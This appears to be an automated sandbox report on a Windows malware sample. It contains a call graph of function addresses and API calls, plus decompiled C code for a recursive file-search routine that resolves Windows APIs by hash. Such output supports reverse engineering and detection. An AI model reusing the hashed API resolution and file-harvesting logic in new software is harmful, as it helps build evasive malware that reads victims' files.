8097->8096 8099 402b7c 2 API calls 8097->8099 8098->8100 8101 405bdd 8099->8101 8100->8077 8104 413a58 8100->8104 8101->8096 8102 405be4 8101->8102 8103 402bab 2 API calls 8102->8103 8103->8100 8105 413a63 8104->8105 8113 412245 8104->8113 8105->8113 8171 405781 8105->8171 8108 405781 4 API calls 8109 413aa0 8108->8109 8174 4057df 8109->8174 8112 405781 4 API calls 8112->8113 8127 402bab 8113->8127 8115 413bad 8114->8115 8116 404056 6 API calls 8115->8116 8118 413bb8 8115->8118 8117 413bc5 8116->8117 8117->8073 8118->8073 8120 402b7c 2 API calls 8119->8120 8122 403fcf 8120->8122 8121 403ff4 8121->8073 8122->8121 8293 403b98 8122->8293 8125 403ff8 GetLastError 8126 402bab 2 API calls 8125->8126 8126->8121 8128 402bb4 GetProcessHeap HeapFree 8127->8128 8129 402bc6 8127->8129 8128->8129 8129->8077 8131 402b98 8130->8131 8131->8086 8133 403236 8132->8133 8135 4031f3 8132->8135 8143 4030a5 8133->8143 8135->8133 8137 403208 8135->8137 8136 403224 8138 403258 8136->8138 8140 4031e5 4 API calls 8136->8140 8149 403263 8137->8149 8138->8088 8138->8090 8140->8138 8141 40320d 8141->8138 8142 4030a5 4 API calls 8141->8142 8142->8136 8155 402ca4 8143->8155 8145 4030b0 8146 4030b5 8145->8146 8159 4030c4 8145->8159 8146->8136 8150 40326d 8149->8150 8151 402b7c 2 API calls 8150->8151 8154 4032b7 8150->8154 8152 40328c 8151->8152 8153 402b7c 2 API calls 8152->8153 8153->8154 8154->8141 8156 403079 8155->8156 8157 40307c 8156->8157 8163 40317b GetPEB 8156->8163 8157->8145 8162 4030eb 8159->8162 8160 4030c0 8160->8136 8162->8160 8165 402c03 8162->8165 8164 40319b 8163->8164 8164->8157 8166 4031e5 3 API calls 8165->8166 8167 402c15 GetProcAddress 8166->8167 8167->8160 8169 4031e5 4 API calls 8168->8169 8170 4059cb 8169->8170 8170->8097 8189 405797 8171->8189 8173 405792 8173->8108 8175 4057eb 8174->8175 8188 405832 8174->8188 8175->8188 8199 4040bb 8175->8199 8178 405839 8180 405853 8178->8180 8226 405627 8178->8226 8179 40582c 8223 403f9e 8179->8223 8237 405762 8180->8237 8186 403f9e 5 API calls 8186->8188 8188->8112 8188->8113 8190 4057a1 8189->8190 8191 4057bd 8189->8191 8190->8191 8193 4056fc 8190->8193 8191->8173 8194 405714 8193->8194 8195 402b7c 2 API calls 8194->8195 8197 405730 8195->8197 8196 405752 8196->8191 8197->8196 8198 402bab 2 API calls 8197->8198 8198->8196 8200 4031e5 4 API calls 8199->8200 8201 4040d5 CreateFileW 8200->8201 8202 4040f8 8201->8202 8203 40418d 8201->8203 8205 4031e5 4 API calls 8202->8205 8204 404183 8203->8204 8243 403c90 8203->8243 8204->8178 8204->8179 8204->8188 8210 404105 8205->8210 8208 40416d 8240 403c40 8208->8240 8210->8208 8214 4031e5 4 API calls 8210->8214 8213 402bab 2 API calls 8213->8204 8216 404131 VirtualAlloc 8214->8216 8215 4040bb 9 API calls 8217 4041c8 8215->8217 8216->8208 8218 404142 8216->8218 8217->8213 8219 4031e5 4 API calls 8218->8219 8220 40414f ReadFile 8219->8220 8220->8208 8221 404160 8220->8221 8222 4031e5 4 API calls 8221->8222 8222->8208 8224 4031e5 4 API calls 8223->8224 8225 403fb1 VirtualFree 8224->8225 8225->8188 8227 4031e5 4 API calls 8226->8227 8228 40563a 8227->8228 8229 405872 8228->8229 8231 405881 8229->8231 8230 4058bc 8233 405797 4 API calls 8230->8233 8234 4058af 8230->8234 8231->8230 8290 4058d4 8231->8290 8233->8234 8234->8180 8236 405781 4 API calls 8236->8230 8238 405781 4 API calls 8237->8238 8239 405770 8238->8239 8239->8186 8241 4031e5 4 API calls 8240->8241 8242 403c52 FindCloseChangeNotification 8241->8242 8242->8204 8244 403ca3 8243->8244 8247 403caa 8243->8247 8270 405dc5 8244->8270 8246 404056 6 API calls 8248 403cbe 8246->8248 8247->8246 8249 403d3a 8247->8249 8250 403d2e 8248->8250 8251 403d17 8248->8251 8252 403ccf 8248->8252 8249->8204 8266 403c59 8249->8266 8250->8249 8253 402bab 2 API calls 8250->8253 8254 405b6f 6 API calls 8251->8254 8255 405b6f 6 API calls 8252->8255 8253->8249 8256 403d14 8254->8256 8257 403cdd 8255->8257 8260 402bab 2 API calls 8256->8260 8258 405b6f 6 API calls 8257->8258 8259 403cee 8258->8259 8259->8256 8275 403d4d 8259->8275 8260->8250 8263 403d0b 8265 402bab 2 API calls 8263->8265 8265->8256 8267 403c21 8266->8267 8268 4031e5 4 API calls 8267->8268 8269 403c33 8268->8269 8269->8215 8269->8217 8284 406799 8270->8284 8272 405dd5 8273 402b7c 2 API calls 8272->8273 8274 405dfe 8273->8274 8274->8247 8287 403bb7 8275->8287 8277 403cfe 8277->8263 8278 403c62 8277->8278 8279 403d4d 5 API calls 8278->8279 8280 403c6d 8279->8280 8281 403c72 8280->8281 8282 4031e5 4 API calls 8280->8282 8281->8263 8283 403c87 CreateDirectoryW 8282->8283 8283->8263 8285 4031e5 4 API calls 8284->8285 8286 4067ad 8285->8286 8286->8272 8288 4031e5 4 API calls 8287->8288 8289 403bc9 GetFileAttributesW 8288->8289 8289->8277 8291 405797 4 API calls 8290->8291 8292 4058a8 8291->8292 8292->8234 8292->8236 8294 4031e5 4 API calls 8293->8294 8295 403baa 8294->8295 8295->8121 8295->8125 9774 40ebc6 9775 4040bb 12 API calls 9774->9775 9776 40ebdf 9775->9776 9781 40ecd7 9776->9781 9794 407795 9776->9794 9779 4056bf 2 API calls 9792 40ec12 9779->9792 9780 403f9e 5 API calls 9780->9781 9782 40ecb5 9783 402bab 2 API calls 9782->9783 9784 40ecbd 9783->9784 9785 413aca 4 API calls 9784->9785 9786 40ecc7 9785->9786 9788 405695 2 API calls 9786->9788 9787 407908 GetProcessHeap RtlAllocateHeap 9787->9792 9789 40eccd 9788->9789 9789->9780 9791 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9791->9792 9792->9782 9792->9787 9792->9791 9793 402bab GetProcessHeap HeapFree 9792->9793 9805 412269 9792->9805 9793->9792 9795 4077ab 9794->9795 9801 4077b3 9795->9801 9812 405ae9 9795->9812 9797 4077e1 9798 407802 9797->9798 9799 4077f8 9797->9799 9797->9801 9802 402b7c 2 API calls 9798->9802 9800 402bab 2 API calls 9799->9800 9800->9801 9801->9779 9801->9789 9803 407811 9802->9803 9804 402bab 2 API calls 9803->9804 9804->9801 9828 40374e 9805->9828 9808 412299 9808->9792 9809 4037be 4 API calls 9810 412291 9809->9810 9811 402bab 2 API calls 9810->9811 9811->9808 9813 405af7 9812->9813 9814 402b7c 2 API calls 9813->9814 9815 405b03 9814->9815 9821 405b5a 9815->9821 9825 405998 9815->9825 9817 405b21 9818 405b61 9817->9818 9820 402b7c 2 API calls 9817->9820 9819 402bab 2 API calls 9818->9819 9819->9821 9822 405b39 9820->9822 9821->9797 9822->9818 9823 405b40 9822->9823 9824 402bab 2 API calls 9823->9824 9824->9821 9826 4031e5 4 API calls 9825->9826 9827 4059ab 9826->9827 9827->9817 9829 402b7c 2 API calls 9828->9829 9830 40375f 9829->9830 9831 4031e5 4 API calls 9830->9831 9833 4037a3 9830->9833 9832 40378f 9831->9832 9832->9833 9834 402bab 2 API calls 9832->9834 9833->9808 9833->9809 9834->9833 8893 410cd1 8898 412093 8893->8898 8896 412093 20 API calls 8897 410cff 8896->8897 8901 4120a5 8898->8901 8919 410cf1 8898->8919 8899 4120b3 8900 404056 6 API calls 8899->8900 8902 4120ba 8900->8902 8901->8899 8905 412100 8901->8905 8903 405b6f 6 API calls 8902->8903 8904 412152 8902->8904 8902->8919 8906 412125 8903->8906 8920 403d74 8904->8920 8908 403fbf 7 API calls 8905->8908 8905->8919 8906->8904 8911 412139 8906->8911 8912 41214d 8906->8912 8908->8902 8910 41218c 8915 402bab 2 API calls 8910->8915 8910->8919 8914 402bab 2 API calls 8911->8914 8916 402bab 2 API calls 8912->8916 8913 402bab 2 API calls 8913->8910 8917 41213e 8914->8917 8915->8919 8916->8904 8918 402bab 2 API calls 8917->8918 8918->8919 8919->8896 8921 403d87 8920->8921 8922 403ea3 8921->8922 8924 405b6f 6 API calls 8921->8924 8923 405b6f 6 API calls 8922->8923 8926 403eb9 8923->8926 8925 403da3 8924->8925 8925->8922 8927 4031e5 4 API calls 8925->8927 8928 4031e5 4 API calls 8926->8928 8936 403f6f 8926->8936 8929 403dbc FindFirstFileW 8927->8929 8930 403ed3 FindFirstFileW 8928->8930 8933 403dd1 8929->8933 8944 403e9c 8929->8944 8935 403ee8 8930->8935 8950 403f8d 8930->8950 8931 402bab 2 API calls 8931->8936 8932 402bab 2 API calls 8932->8922 8934 4031e5 4 API calls 8933->8934 8942 405b6f 6 API calls 8933->8942 8949 403d74 15 API calls 8933->8949 8954 402bab 2 API calls 8933->8954 8955 403f63 8933->8955 8937 403e84 FindNextFileW 8934->8937 8939 4031e5 4 API calls 8935->8939 8941 405b6f 6 API calls 8935->8941 8946 403f75 8935->8946 8953 402bab 2 API calls 8935->8953 8963 40fa23 8935->8963 8936->8910 8936->8913 8937->8933 8938 403e96 8937->8938 8960 403bef 8938->8960 8943 403f50 FindNextFileW 8939->8943 8941->8935 8942->8933 8943->8935 8945 403f87 8943->8945 8944->8932 8947 403bef 5 API calls 8945->8947 8948 402bab 2 API calls 8946->8948 8947->8950 8951 403f7b 8948->8951 8949->8933 8950->8931 8952 403bef 5 API calls 8951->8952 8952->8936 8953->8935 8954->8933 8956 402bab 2 API calls 8955->8956 8957 403f69 8956->8957 8958 403bef 5 API calls 8957->8958 8958->8936 8961 4031e5 4 API calls 8960->8961 8962 403c01 FindClose 8961->8962 8962->8944 8964 40fa39 8963->8964 8965 410293 8964->8965 8966 405b6f 6 API calls 8964->8966 8965->8935 8967 40ffcc 8966->8967 8967->8965 8968 4040bb 12 API calls 8967->8968 8969 40ffeb 8968->8969 8970 41028c 8969->8970 8971 41027d 8969->8971 8973 402b7c 2 API calls 8969->8973 8972 402bab 2 API calls 8970->8972 8974 403f9e 5 API calls 8971->8974 8972->8965 8975 41001e 8973->8975 8974->8970 8975->8971 8976 40a423 4 API calls 8975->8976 8977 41004a 8976->8977 8978 4031e5 4 API calls 8977->8978 8979 41005c 8978->8979 8980 4031e5 4 API calls 8979->8980 8981 410079 8980->8981 8982 4031e5 4 API calls 8981->8982 8983 410096 8982->8983 8984 4031e5 4 API calls 8983->8984 8985 4100b0 8984->8985 8986 4031e5 4 API calls 8985->8986 8987 4100cd 8986->8987 8988 4031e5 4 API calls 8987->8988 8989 4100ea 8988->8989 9019 412516 8989->9019 8991 4100fd 8992 40642c 5 API calls 8991->8992 8993 41013e 8992->8993 8994 410142 8993->8994 8995 41019f 8993->8995 8996 40488c 5 API calls 8994->8996 8998 4031e5 4 API calls 8995->8998 8997 410151 8996->8997 8999 41019c 8997->8999 9001 404866 4 API calls 8997->9001 9011 4101bb 8998->9011 9000 41022a 8999->9000 9003 40642c 5 API calls 8999->9003 9007 413a58 13 API calls 9000->9007 9002 410163 9001->9002 9004 41018e 9002->9004 9006 406c4c 6 API calls 9002->9006 9005 410201 9003->9005 9008 403c40 5 API calls 9004->9008 9009 410205 9005->9009 9010 41022f 9005->9010 9012 410178 9006->9012 9013 41026e 9007->9013 9008->8999 9014 4126a7 7 API calls 9009->9014 9022 4125db 9010->9022 9016 4031e5 4 API calls 9011->9016 9017 406c4c 6 API calls 9012->9017 9018 402bab 2 API calls 9013->9018 9014->9000 9016->8999 9017->9004 9018->8971 9020 4031e5 4 API calls 9019->9020 9021 412539 9020->9021 9021->8991 9023 40488c 5 API calls 9022->9023 9024 4125ec 9023->9024 9025 41269f 9024->9025 9026 4031e5 4 API calls 9024->9026 9025->9000 9027 412609 9026->9027 9028 41268f 9027->9028 9029 4031e5 4 API calls 9027->9029 9030 403c40 5 API calls 9028->9030 9031 41262a 9029->9031 9030->9025 9037 412675 9031->9037 9039 4124f1 9031->9039 9032 4031e5 4 API calls 9032->9028 9035 4124f1 4 API calls 9038 412663 9035->9038 9036 4031e5 4 API calls 9036->9037 9037->9032 9038->9036 9040 4031e5 4 API calls 9039->9040 9041 412503 9040->9041 9041->9035 9041->9038 9228 4049dc 9229 4031e5 4 API calls 9228->9229 9230 4049ef 9229->9230 10092 40cddd 10093 405b6f 6 API calls 10092->10093 10094 40cdee 10093->10094 10095 40ce06 10094->10095 10096 413a58 13 API calls 10094->10096 10097 40ce59 10095->10097 10099 405b6f 6 API calls 10095->10099 10098 40ce00 10096->10098 10100 402bab 2 API calls 10098->10100 10101 40ce1c 10099->10101 10100->10095 10101->10097 10103 403d74 19 API calls 10101->10103 10106 40ce52 10101->10106 10102 402bab 2 API calls 10102->10097 10104 40ce45 10103->10104 10105 402bab 2 API calls 10104->10105 10104->10106 10105->10106 10106->10102 9231 40ecde 9232 412093 20 API calls 9231->9232 9233 40ecfd 9232->9233 9234 412093 20 API calls 9233->9234 9235 40ed0d 9234->9235 9239 40e8df 9240 412093 20 API calls 9239->9240 9241 40e8f8 9240->9241 9242 412093 20 API calls 9241->9242 9243 40e908 9242->9243 9250 404b22 9243->9250 9245 40e91c 9246 40e936 9245->9246 9249 40e93d 9245->9249 9257 40e944 9245->9257 9248 402bab 2 API calls 9246->9248 9248->9249 9251 402b7c 2 API calls 9250->9251 9253 404b33 9251->9253 9252 404b66 9252->9245 9253->9252 9266 4049b3 9253->9266 9256 402bab 2 API calls 9256->9252 9258 4056bf 2 API calls 9257->9258 9259 40e952 9258->9259 9260 40e976 9259->9260 9261 4057df 13 API calls 9259->9261 9260->9246 9262 40e966 9261->9262 9263 413aca 4 API calls 9262->9263 9264 40e970 9263->9264 9265 405695 2 API calls 9264->9265 9265->9260 9267 4031e5 4 API calls 9266->9267 9268 4049c6 9267->9268 9268->9252 9268->9256 9269 4139de 9278 413855 9269->9278 9271 4139f1 9272 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9271->9272 9273 4139f7 9272->9273 9274 413866 59 API calls 9273->9274 9275 413a2d 9274->9275 9276 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9275->9276 9277 413a34 9276->9277 9279 4031e5 4 API calls 9278->9279 9280 413864 9279->9280 9280->9280 10185 4116e7 10186 4117ba 10185->10186 10187 405b6f 6 API calls 10186->10187 10192 4117f1 10186->10192 10188 4117d0 10187->10188 10189 404cbf 8 API calls 10188->10189 10188->10192 10190 4117eb 10189->10190 10191 402bab 2 API calls 10190->10191 10191->10192 9300 4094e7 9301 404b22 6 API calls 9300->9301 9302 4094fe 9301->9302 9303 409554 9302->9303 9304 405b6f 6 API calls 9302->9304 9305 409514 9304->9305 9307 404b22 6 API calls 9305->9307 9312 40954d 9305->9312 9306 402bab 2 API calls 9306->9303 9308 40952d 9307->9308 9310 409408 15 API calls 9308->9310 9314 409544 9308->9314 9309 402bab 2 API calls 9309->9312 9311 40953e 9310->9311 9313 402bab 2 API calls 9311->9313 9312->9306 9313->9314 9314->9309 9323 4058ea 9324 4031e5 4 API calls 9323->9324 9325 4058fd StrStrA 9324->9325 10234 40d4ea 10235 404bee 6 API calls 10234->10235 10236 40d500 10235->10236 10237 404bee 6 API calls 10236->10237 10242 40d5a0 10236->10242 10238 40d529 10237->10238 10239 404bee 6 API calls 10238->10239 10240 40d537 10239->10240 10241 404bee 6 API calls 10240->10241 10243 40d546 10241->10243 10243->10242 10244 405872 4 API calls 10243->10244 10245 40d56d 10244->10245 10246 405872 4 API calls 10245->10246 10247 40d57c 10246->10247 10248 405872 4 API calls 10247->10248 10249 40d58e 10248->10249 10250 405872 4 API calls 10249->10250 10250->10242 10251 40a3ea 10252 40374e 6 API calls 10251->10252 10253 40a403 10252->10253 10254 40a419 10253->10254 10255 4059d8 4 API calls 10253->10255 10256 40a411 10255->10256 10257 402bab 2 API calls 10256->10257 10257->10254 9363 404df3 WSAStartup 9367 4091f6 9368 404b22 6 API calls 9367->9368 9369 40920b 9368->9369 9370 409222 9369->9370 9371 409408 15 API calls 9369->9371 9372 40921c 9371->9372 9373 402bab 2 API calls 9372->9373 9373->9370 10342 4117fe 10343 404c4e 6 API calls 10342->10343 10344 411888 10343->10344 10345 404c4e 6 API calls 10344->10345 10348 411925 10344->10348 10346 4118ab 10345->10346 10346->10348 10361 4119b3 10346->10361 10349 4118c5 10350 4119b3 4 API calls 10349->10350 10351 4118d0 10350->10351 10351->10348 10352 4056bf 2 API calls 10351->10352 10353 4118fd 10352->10353 10354 405872 4 API calls 10353->10354 10355 41190a 10354->10355 10356 405872 4 API calls 10355->10356 10357 411915 10356->10357 10358 413aca 4 API calls 10357->10358 10359 41191f 10358->10359 10360 405695 2 API calls 10359->10360 10360->10348 10362 4119c6 10361->10362 10364 4119bf 10361->10364 10363 4031e5 4 API calls 10362->10363 10363->10364 10364->10349 9377 40e880 9378 41219c 14 API calls 9377->9378 9379 40e88e 9378->9379 9380 41219c 14 API calls 9379->9380 9381 40e89c 9380->9381 9896 40e48a 9897 404bee 6 API calls 9896->9897 9899 40e4d0 9897->9899 9898 40e4f4 9899->9898 9900 405872 4 API calls 9899->9900 9900->9898 9478 410390 9479 404b22 6 API calls 9478->9479 9480 4103a5 9479->9480 9481 410409 9480->9481 9482 405b6f 6 API calls 9480->9482 9487 4103ba 9482->9487 9483 410402 9484 402bab 2 API calls 9483->9484 9484->9481 9485 4103fb 9486 402bab 2 API calls 9485->9486 9486->9483 9487->9483 9487->9485 9488 403d74 19 API calls 9487->9488 9489 4103ee 9488->9489 9489->9485 9490 402bab 2 API calls 9489->9490 9490->9485 9945 40ed96 9946 4040bb 12 API calls 9945->9946 9958 40edb0 9946->9958 9947 40ef90 9948 40ef87 9949 403f9e 5 API calls 9948->9949 9949->9947 9950 412269 6 API calls 9950->9958 9951 405ae9 6 API calls 9951->9958 9952 40ef61 9953 40ef6e 9952->9953 9954 402bab 2 API calls 9952->9954 9955 40ef7c 9953->9955 9956 402bab 2 API calls 9953->9956 9954->9953 9955->9948 9957 402bab 2 API calls 9955->9957 9956->9955 9957->9948 9958->9947 9958->9948 9958->9950 9958->9951 9958->9952 9959 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9958->9959 9960 402bab GetProcessHeap HeapFree 9958->9960 9959->9958 9960->9958 9961 40ef98 9962 404c4e 6 API calls 9961->9962 9963 40efb6 9962->9963 9964 40f02a 9963->9964 9976 40f054 9963->9976 9967 404bee 6 API calls 9968 40efda 9967->9968 9969 404bee 6 API calls 9968->9969 9970 40efe9 9969->9970 9970->9964 9971 405872 4 API calls 9970->9971 9972 40f008 9971->9972 9973 405872 4 API calls 9972->9973 9974 40f01a 9973->9974 9975 405872 4 API calls 9974->9975 9975->9964 9977 40f064 9976->9977 9978 402b7c 2 API calls 9977->9978 9980 40f072 9978->9980 9979 40efca 9979->9967 9980->9979 9982 405ecd 9980->9982 9983 4059b8 4 API calls 9982->9983 9984 405edf 9983->9984 9984->9980 9497 410c98 9498 41219c 14 API calls 9497->9498 9499 410ca8 9498->9499 9500 41219c 14 API calls 9499->9500 9501 410cb5 9500->9501 9502 412093 20 API calls 9501->9502 9503 410cc9 9502->9503 10107 41249c 10108 4056bf 2 API calls 10107->10108 10109 4124aa 10108->10109 10110 4057df 13 API calls 10109->10110 10115 4124ce 10109->10115 10111 4124be 10110->10111 10112 413aca 4 API calls 10111->10112 10113 4124c8 10112->10113 10114 405695 2 API calls 10113->10114 10114->10115 9507 40f49e 9508 40f4b6 13 API calls 9507->9508 9509 40f4a8 9508->9509 9510 40929e 9511 413b28 6 API calls 9510->9511 9512 4092a4 9511->9512 9513 405b6f 6 API calls 9512->9513 9514 4092af 9513->9514 9515 4092c5 9514->9515 9516 409408 15 API calls 9514->9516 9517 4092bf 9516->9517 9518 402bab 2 API calls 9517->9518 9518->9515 10139 407fa4 10140 407fb7 10139->10140 10141 402b7c 2 API calls 10140->10141 10142 407fee 10140->10142 10143 40800d 10141->10143 10143->10142 10144 4037be 4 API calls 10143->10144 10145 40803c 10144->10145 10146 402bab 2 API calls 10145->10146 10146->10142 9555 4090aa 9556 404b22 6 API calls 9555->9556 9557 4090c1 9556->9557 9558 4090d8 9557->9558 9559 409408 15 API calls 9557->9559 9560 404b22 6 API calls 9558->9560 9561 4090d2 9559->9561 9562 4090eb 9560->9562 9563 402bab 2 API calls 9561->9563 9564 409104 9562->9564 9565 408c4d 15 API calls 9562->9565 9563->9558 9566 4090fe 9565->9566 9567 402bab 2 API calls 9566->9567 9567->9564 9574 409cae 9589 404b79 9574->9589 9576 409cc5 9578 405b6f 6 API calls 9576->9578 9579 409d2f 9576->9579 9581 409d27 9576->9581 9577 402bab 2 API calls 9577->9579 9580 409cec 9578->9580 9580->9581 9582 404b79 6 API calls 9580->9582 9581->9577 9583 409d05 9582->9583 9584 409d1e 9583->9584 9585 408c4d 15 API calls 9583->9585 9586 402bab 2 API calls 9584->9586 9587 409d18 9585->9587 9586->9581 9588 402bab 2 API calls 9587->9588 9588->9584 9590 404b22 6 API calls 9589->9590 9591 404b8a 9590->9591 9591->9576 10263 411fb3 10264 405b6f 6 API calls 10263->10264 10266 412013 10264->10266 10265 412075 10266->10265 10267 41206a 10266->10267 10282 411a8d 10266->10282 10269 402bab 2 API calls 10267->10269 10269->10265 10271 4056bf 2 API calls 10272 41203d 10271->10272 10273 405872 4 API calls 10272->10273 10274 41204a 10273->10274 10275 413aca 4 API calls 10274->10275 10276 412054 10275->10276 10277 405695 2 API calls 10276->10277 10278 41205a 10277->10278 10279 413a58 13 API calls 10278->10279 10280 412064 10279->10280 10281 402bab 2 API calls 10280->10281 10281->10267 10283 402b7c 2 API calls 10282->10283 10284 411aa3 10283->10284 10302 411f05 10284->10302 10305 404ada 10284->10305 10287 404ada 4 API calls 10288 411cad 10287->10288 10289 411f0c 10288->10289 10290 411cc0 10288->10290 10291 402bab 2 API calls 10289->10291 10308 405eb6 10290->10308 10291->10302 10293 411d3c 10294 4031e5 4 API calls 10293->10294 10303 411d7b 10294->10303 10295 411ea6 10296 4031e5 4 API calls 10295->10296 10297 411eb5 10296->10297 10298 4031e5 4 API calls 10297->10298 10300 411ed6 10298->10300 10299 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10299->10303 10301 405eb6 4 API calls 10300->10301 10301->10302 10302->10267 10302->10271 10303->10295 10303->10299 10304 405eb6 4 API calls 10303->10304 10304->10303 10306 4031e5 4 API calls 10305->10306 10307 404afd 10306->10307 10307->10287 10309 405998 4 API calls 10308->10309 10310 405ec8 10309->10310 10310->10293 9621 40f6b8 9622 41219c 14 API calls 9621->9622 9623 40f6c7 9622->9623 9624 41219c 14 API calls 9623->9624 9625 40f6d5 9624->9625 9626 41219c 14 API calls 9625->9626 9627 40f6df 9626->9627 9646 40d6bd 9647 4056bf 2 API calls 9646->9647 9648 40d6c9 9647->9648 9659 404cbf 9648->9659 9651 404cbf 8 API calls 9652 40d6f4 9651->9652 9653 404cbf 8 API calls 9652->9653 9654 40d702 9653->9654 9655 413aca 4 API calls 9654->9655 9656 40d711 9655->9656 9657 405695 2 API calls 9656->9657 9658 40d71f 9657->9658 9660 402b7c 2 API calls 9659->9660 9661 404ccd 9660->9661 9662 404ddc 9661->9662 9663 404b8f 5 API calls 9661->9663 9662->9651 9664 404ce4 9663->9664 9665 404dd4 9664->9665 9666 402b7c 2 API calls 9664->9666 9667 402bab 2 API calls 9665->9667 9677 404d04 9666->9677 9667->9662 9668 404dcc 9669 404a39 5 API calls 9668->9669 9669->9665 9670 404dc6 9671 402bab 2 API calls 9670->9671 9671->9668 9672 402b7c 2 API calls 9672->9677 9673 404b8f 5 API calls 9673->9677 9674 402bab GetProcessHeap HeapFree 9674->9677 9675 404a39 5 API calls 9675->9677 9676 405b6f 6 API calls 9676->9677 9677->9668 9677->9670 9677->9672 9677->9673 9677->9674 9677->9675 9677->9676 9678 404cbf 8 API calls 9677->9678 9680 40d726 9677->9680 9678->9677 9696 404bee 9680->9696 9683 405872 4 API calls 9686 40d761 9683->9686 9684 404bee 6 API calls 9684->9686 9685 405872 4 API calls 9685->9686 9686->9684 9686->9685 9688 40d971 9686->9688 9689 405781 4 API calls 9688->9689 9694 40d9bb 9688->9694 9703 404ba7 9688->9703 9689->9688 9691 405781 4 API calls 9691->9694 9693 405872 4 API calls 9693->9694 9694->9691 9694->9693 9695 40db63 9694->9695 9706 404c4e 9694->9706 9713 4037be 9694->9713 9695->9677 9697 402b7c 2 API calls 9696->9697 9699 404bff 9697->9699 9698 404c3b 9698->9683 9698->9695 9699->9698 9700 4031e5 4 API calls 9699->9700 9701 404c28 9700->9701 9701->9698 9702 402bab 2 API calls 9701->9702 9702->9698 9704 4031e5 4 API calls 9703->9704 9705 404bca 9704->9705 9705->9688 9707 402b7c 2 API calls 9706->9707 9709 404c60 9707->9709 9708 404ca4 9708->9694 9709->9708 9710 4031e5 4 API calls 9709->9710 9711 404c8d 9710->9711 9711->9708 9712 402bab 2 API calls 9711->9712 9712->9708 9714 4031e5 4 API calls 9713->9714 9715 4037e2 9714->9715 9716 40382b 9715->9716 9717 402b7c 2 API calls 9715->9717 9716->9694 9718 403802 9717->9718 9719 403832 9718->9719 9721 403809 9718->9721 9720 4036a3 4 API calls 9719->9720 9720->9716 9722 4036a3 4 API calls 9721->9722 9722->9716 9723 40f0bf 9724 4056bf 2 API calls 9723->9724 9725 40f0c9 9724->9725 9726 40f115 9725->9726 9727 404cbf 8 API calls 9725->9727 9728 41219c 14 API calls 9726->9728 9730 40f0ed 9727->9730 9729 40f128 9728->9729 9731 404cbf 8 API calls 9730->9731 9732 40f0fb 9731->9732 9733 413aca 4 API calls 9732->9733 9734 40f10a 9733->9734 9735 405695 2 API calls 9734->9735 9735->9726

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 183 403d74-403d90 call 4067c4 186 403d96-403da9 call 405b6f 183->186 187 403ea9-403ec0 call 405b6f 183->187 192 403ea6-403ea8 186->192 193 403daf-403dcb call 4031e5 FindFirstFileW 186->193 194 403f95 187->194 195 403ec6-403ee2 call 4031e5 FindFirstFileW 187->195 192->187 201 403dd1-403dd8 193->201 202 403e9d-403ea4 call 402bab 193->202 198 403f97-403f9d 194->198 203 403ee8-403ef8 call 405d24 195->203 204 403f8e-403f94 call 402bab 195->204 205 403e75-403e90 call 4031e5 FindNextFileW 201->205 206 403dde-403de2 201->206 202->192 218 403f03-403f0a 203->218 219 403efa-403f01 203->219 204->194 205->201 222 403e96-403e97 call 403bef 205->222 211 403e12-403e22 call 405d24 206->211 212 403de4-403df9 call 405eff 206->212 231 403e30-403e4c call 405b6f 211->231 232 403e24-403e2e 211->232 212->205 228 403dfb-403e10 call 405eff 212->228 224 403f12-403f2d call 405b6f 218->224 225 403f0c-403f10 218->225 219->218 223 403f41-403f5c call 4031e5 FindNextFileW 219->223 237 403e9c 222->237 240 403f87-403f88 call 403bef 223->240 241 403f5e-403f61 223->241 224->223 238 403f2f-403f33 224->238 225->223 225->224 228->205 228->211 231->205 245 403e4e-403e6f call 403d74 call 402bab 231->245 232->205 232->231 237->202 243 403f75-403f85 call 402bab call 403bef 238->243 244 403f35-403f36 call 40fa23 238->244 249 403f8d 240->249 241->203 243->198 251 403f39-403f40 call 402bab 244->251 245->205 259 403f63-403f73 call 402bab call 403bef 245->259 249->204 251->223 259->198
                        C-Code - Quality: 85%
                        			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                        				struct _WIN32_FIND_DATAW _v596;
                        				void* __ebx;
                        				void* _t35;
                        				void* _t40;
                        				int _t43;
                        				void* _t52;
                        				int _t56;
                        				intOrPtr _t60;
                        				void* _t66;
                        				void* _t73;
                        				void* _t74;
                        				WCHAR* _t98;
                        				void* _t99;
                        				void* _t100;
                        				void* _t101;
                        				WCHAR* _t102;
                        				void* _t103;
                        				void* _t104;
                        
                        				L004067C4(0xa); // executed
                        				_t72 = 0;
                        				_t100 = 0x2e;
                        				_t106 = _a16;
                        				if(_a16 == 0) {
                        					L15:
                        					_push(_a8);
                        					_t98 = E00405B6F(0, L"%s\\%s", _a4);
                        					_t104 = _t103 + 0xc;
                        					if(_t98 == 0) {
                        						L30:
                        						__eflags = 0;
                        						return 0;
                        					}
                        					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
                        					_t35 = FindFirstFileW(_t98,  &_v596); // executed
                        					_t73 = _t35;
                        					if(_t73 == 0xffffffff) {
                        						L29:
                        						E00402BAB(_t98);
                        						goto L30;
                        					}
                        					L17:
                        					while(1) {
                        						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
                        							if(_v596.dwFileAttributes != 0x10) {
                        								L21:
                        								_push( &(_v596.cFileName));
                        								_t40 = E00405B6F(_t124, L"%s\\%s", _a4); // executed
                        								_t101 = _t40;
                        								_t104 = _t104 + 0xc;
                        								if(_t101 == 0) {
                        									goto L24;
                        								}
                        								if(_a12 == 0) {
                        									E00402BAB(_t98);
                        									E00403BEF(_t73);
                        									return _t101;
                        								}
                        								_a12(_t101);
                        								E00402BAB(_t101);
                        								goto L24;
                        							}
                        							_t124 = _a20;
                        							if(_a20 == 0) {
                        								goto L24;
                        							}
                        							goto L21;
                        						} else {
                        							L24:
                        							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
                        							_t43 = FindNextFileW(_t73,  &_v596); // executed
                        							if(_t43 == 0) {
                        								E00403BEF(_t73); // executed
                        								goto L29;
                        							}
                        							_t100 = 0x2e;
                        							continue;
                        						}
                        					}
                        				}
